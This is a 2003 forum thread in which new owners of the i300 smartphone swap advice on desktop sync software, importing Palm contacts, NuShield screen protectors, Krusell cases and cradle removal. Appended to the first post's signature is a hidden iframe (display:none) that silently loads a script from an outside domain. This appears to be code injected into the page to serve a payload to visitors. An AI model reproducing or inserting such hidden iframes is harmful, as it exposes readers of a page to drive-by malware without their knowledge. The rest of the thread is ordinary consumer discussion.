+ Reply to Thread
Page 1 of 5 1 2 3 4 5 LastLast

New i300 owner questions

Hi,

Now that the price has significantly dropped, I've finally decided to pick one up yesterday at a local Sprint store.

A few questions please.

* I have a Windows 2000 pc. The i300 manuals says the desktop software requires 95/98/ME or NT. Will the software still work on a Windows 2000 platform or should I down load the latest from palm?

* I used to have a Palm Pilot that finally retired a few months ago. Is there a quick and easy way to import address book data from it into the i300?

* I'm thinking about getting a protector of some kind that allow for visibility and access to the buttons and screen. I think I've seen one before. Where can I find such a thing and is there a recommended list of sites for accessories for the i300?

* Finally (a stupid one)... is there a "proper" way of removing the i300 from the charging/sync cradle? Unlike my old palm, this actually locks into place. I don't want to pull to hard and cause any pins to break.

Would appreciate your help.

Thanks,
    eagle<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: New i300 owner questions

gratz on yr purchase. I havent owned an i300 for a good few months now since I traded in for the i330 but I remember mine well enough.

the palm desktop software is fully compatible with win2k. you should have no problems there.

importing addy book? if you still have the palm you could do a direct IR beam of the data in a minute or so depending on the size of your address book. if you only have its backup data you could try manually lifting the files into the new installation of palm desktop and letting it re-synch from there.

screen protector? search online for "fellowes i330" and i'm sure a bunch will come up. there may be cheaper ones here and there but fellowes is always a safe bet.

removing from cradle? yeah mine sounded a little crunchy too... i always removed mine by tilting it forward and then it usually lifted off pretty easily. lifting straight up without tilting does feel a bit unhappy. see if tilting works for you.

best of luck and grats on the phone again

Hi nethyr,

Thanks for your help.

I looked at the desktop software for my old Palm Pilot Pro. It's version 4.1, the latest version.

Since I've read in other posts that 4.1 works fine with the i300, I simply connected the cradle to the pc, did the hotsync, and voila! It worked just fine .... that is after I remembered the password to my palm account.

Regarding removal of the i300 from the cradle, you're instructions were perfect. I tilted the i300 such that it is vertical. At this position, it comes right out almost effortlessly.

I haven't found any fellowes i300/i330 screen protectors on web searches. I did find overlays from Writeright and CompanionLink for around $15 though.

Thanks again for the help.

I'm glad I've gotten this device finally. I really will just use the pda and phone features. Won't be doing any email or web browsing. My Pilot Pro died a few months ago. My Samsung SCH-3500 battery pins broke off. Still works but isn't secure anymore due to lack of the pin.

With the price as low as it has been, I just couldn't pass the i300 up anymore.

r,
    eagle

A few more notes.

I guess the Writeright screen overlay is by Fellowes.

After doing a web search, I finally settled on the Nushield protector. Seems to be a good alternative that has gotten quite a bit of approval from pda owners not happy with "adhesive" type overlays. Placed an order already. Hope it meets my expectations.

Will be placing an order tomorrow also for the Krusell pda cover which is one of the best looking cases I've seen specific to the i300.

If anyone has experience on the Nushield overlays or the Krusell pda cover, would appreciate your feedback.

Thanks,
    eagle

glad things worked out for you. the case looks awesome. when i had my i300 i had a fake leather case that i bought from some noname online place, and it was perfect.

sadly i cant find one quite as cute for the i330 but for some reason i'm a bit more confident carrying it in my pocket caseless (even though every once in a while i'll hear a dull *thwak* as i accidentally walk too close to something and i get a shiver of $500 worth of electronics getting smacked around).

the case you found looks really nice though. let me know how it works for you

Hi,

Just got the Krusell case from razzy.com. Cost for the case is $29.95. With USPS Priority Service for a few more bucks, I got it in two days.

The case looks as good as pictured above. Phone fits snugly in the case. All areas that require external access or exposure have cutouts in the case. Supple leather. Quality product.

I didn't get the swivel clip since I'm afraid I'd bang the screen against another object and ruin it. I remember how many times I had done that with my previous phones. They were scuffed up pretty badly. It's probably safe to presume that the pda screen won't be as forgiving. Hence, I'll just keep it in my pocket as I've been doing with my last phone.

Interesting thing about USPS, their online tracking system isn't real time. They update info only at the end of each day. Hence, I've gotten the case already before the data showed up online.

Now just waiting on the Nushield screen overlay.

Thanks,
    eagle
    Last edited by eagle; 07-14-2003 at 09:59 AM.

just ordered one too............is that a cut-out for the screen or a plastic cover? I'd like to do away with the plastic cover since I have a CompanionLink screen protecter.

I found one on ebay from this seller:

http://cgi.ebay.com/ws/eBayISAPI.dll...category=20375

I used the buy it now (because I am inpatient..lol) and it came with a free swivel clip ($9.95 through Razzy.com)

From what I have seen, if you are willing to wait 3-4 days you can win it for $24.99. There doesn't seem to be anyone bidding on these. Plus you get the $10 clip.

I went with the fed-ex 1-3 day delivery with insurance and tracking number for $8

Check out their website for more deals. The clips they offer are less expensive then razzy.com

http://www.sfplanet.com/index.cfm/fa...parentcat/4195
    Last edited by BahrKode; 07-14-2003 at 07:30 PM.

Hi bahrkode,

I actually have seen their website and auctions at ebay when I was still shopping around.

I must be one of the last few who still haven't participated in online auctions. Still very leery about it. I'm sure eventually I'll convert.

Thanks,
    eagle

Hi ycats,

Missed your post/question earlier.

The site doesn't really say what type material they use.

Per the nushield website:

"NuShield films are only 0.005" thin and yet are stiff enough to stay flat on the screen without warping during use. A combination of careful material selection and proprietary film conversion makes NuShield the longest lasting product of its type. There simply is no comparison to any other screen protection product available."
    • Tough, durable, transparent writing surface protects against dust, scratches and gouges on your screen.
    • No adhesive used to hold in place - will not cause air bubbles or leave sticky residue on screen.
    • Installs easily in seconds, can be removed to be cleaned and reinstalled on your handheld computer.
    • Each NuShield film provides long lasting protection.
    • Abrasion and chemical resistant for long life.
    • Pleasant feel with a super thin film surface.
    • NuShield screen protectors utilize patent pending technology not available on other screen protectors, to maximize clarity of color screens.
    After scouring the web last week, found just a couple of good potentials.

The brando brand from Hongkong appears to be a popular one also with pda users.

Another is Strong Engineering. They do custom sizes on request.

Another one is the WriteShields (not the same as Writerights by Fellowes).

Will let you guys know about the Nushields when they arrive.

r,
    eagle
    Last edited by eagle; 07-16-2003 at 09:23 AM.

Hi,

Finally got the NuShield today.

The package came a week after I placed the order.

There are four sheets in the package, each sheet is supposed to last up to four months. So, this set theoretically and depending on my use should last at least a year.

Each sheet has a mask film that needs to be removed. This masked side is the writing surface while the unmasked side is the side that will be pressed against the screen.

Removal of the mask is easy. Per the instructions, one simply adheres a scotch tape to a corner and quickly pull back. The mask film comes right off.

Should one drop the protector and "forget" which the writing side is, NuShield has made it easy to figure this out. They've made the masked side curve in a bit. Simple but it works.

Now on to the installation...

I cleaned the i300 screen and the side of the Nushield protector side that will touch the device screen using the cleaning pads ($1.99) that I had ordered along with the protector sheets. It is a two step process: Step 1 uses the cleaner cloth moist with screen cleaner; Step 2 dries the surface with a lint-free optical grade cloth. The idea here is to remove any dirt, lint, debris, or wax deposits from the screen and protector surfaces.

After doing the cleaning process, you position and slide one edge (the longer edge) of the protector against the gap between the screen and the case. Once positioned securely, you curve the opposite edge of the protector and guide it in the channel on the opposite side of the screen. I found that the protector slips in the gap a little easier by coaxing it in with my thumb finger nail (nail side down).

The instructions say you can get this done in one minute. It took me a little more than that though. Slipping the protector into the screen face without laying my finger prints on the screen side was a challenge considering it size and the handling you have to do to slip it into place. To prevent fingerprints, I handled it with the dry cleaner cloth.

After the installation, the screen looks absolutely great. No bubbles and you can't even tell the protector is there. It looks like just the regular screen.

By the way, removal is a breeze. Using the same technique for removing the mask, I used a scotch tape to peel it off. No problemo. It came right off. I had to remove it the first time 'coz my prints were all over the screen side of the protector when I was trying to install it. So, I peeled it off, cleaned the screen and the protector but this time used the dry lint-free cloth from Step 2 to handle the protector.

So, after this long post, the bottom line is that the NuShield works as advertised.

With the Krusell case and the NuShield, I'm pretty much all set.

Thanks,
    eagle

I received the Krusell pda cover yesterday and it's very, very nice.
    Only downside is that you can't slide it in the cradle with it on..........but all the openings are there to be accessed.

I don't think there's a better-looking cover than this one.

Mine should me in tomorrow. I hope what you said is indeed the only downside. I was a little worried it wouldn't fit in the case with the extended life battery (which is a little thicker then the standard)

Hi bahrkode,

How much thicker is the extended battery?

The phone with the standard battery fits really snugly already.

Any thicker and it would really be a tight fit.

Hope it works out.

r,
    eagle

UPDATE:

OK...I just got the case. The phone did fit in the case with the extended life battery. (wheew!)

The only problem I am having is that it is a little difficult to remove the stylus. I have to kind of put my finger tip in the hole of the case then slide upward. I can see the case tearing or getting pretty streched in that part pretty quick. (Not the top hole where the stylus slides out of, but the oval shape hole on the back where you push it out)

Anyone else having this problem?
    Last edited by BahrKode; 07-18-2003 at 12:35 PM.

oh...and one more thing

I can't get the car charger to connect to the phone when the case is on. The opening doesn't appear to be wide enough for the connector to sit and "click in" properly.

Hi Bahrkode,

Glad to hear that the phone with the extended battery fits.

Regarding getting the stylus out, yes that is what I do. It's a two step process. You push it up with your finger tip through the hole where the stylus ridges on the top are exposed. You then "fish it out" from the top hole. Not sure about potential tearing though. But it may be the case with an extended battery.

Can't comment on the car charger connection since I don't have one.

If you decide against the case, I think razzy.com has a return policy. There may be a restocking fee penalty though. Not sure.

While looking for cases for the i300, I came across the ones by abcases.com. Nice cases but are expensive at about $45. The cover also covers the speaker which muffles the ringer which is hard to hear already as it is.

Thanks,
    eagle
    Last edited by eagle; 07-19-2003 at 06:53 AM.

Smile New i300 User / New to Posts.

Hello,

I'm a new i300 user (my phone is coming in a few days).

I have a few questions for you i300 users after reading the posts here.

1. Thoughts on the i300 phone for users that have used it now for a while vs. traditional sprint phones.

2. Is the i300 G3 capable?

3. Is web browsing really feasible on this unit?

4. Lastly, after reading the posts, I ordered the nusheilds and Krussell w/swivel base. This post helped me out and I want to say thank you for the feedback here.

1. Thoughts on the i300 phone for users that have used it now for a while vs. traditional sprint phones.
    The I300 truly is a SMARTPHONE! It is awesome! I would never go back to traditional phones. It's like a swiss army knife. It has 101 uses...lol I even use it now as a universal remote control (my friends freak out when I change channels and lower the volume of my tv...with MY PHONE!!..lol) With picture caller id, all the hacks, skins, etc...wow..YES...very happy with it!

2. Is the i300 G3 capable?
    No.

3. Is web browsing really feasible on this unit?
    Yes.

4. Lastly, after reading the posts, I ordered the nusheilds and Krussell w/swivel base. This post helped me out and I want to say thank you for the feedback here.
    You are welcome! Good choice on the case. I love this Krusell case. It makes the phone look really good! I love the swivel clip also.

I look at the I300 as a good starter phone for the palm phone market. I will soon upgrade to the I330 or maybe the I500. But for now, I am loving this phone!

Hi,

Yes, there are other more advanced converged devices out there.

I chose this one however because

* Favorable reviews from reviewers and owners alike

* "Hackable" in that you can personalize it thanks to the hard work of a number of folks who are nice enough to share their work

* Relatively bug-free

* Value for the buck! Only $200 compared to others costing at least twice as much

Also, I've been a Sprint customer ever since Sprint cellular was launched and have been happy with them, so I've pretty much stuck with them.

r,
    eagle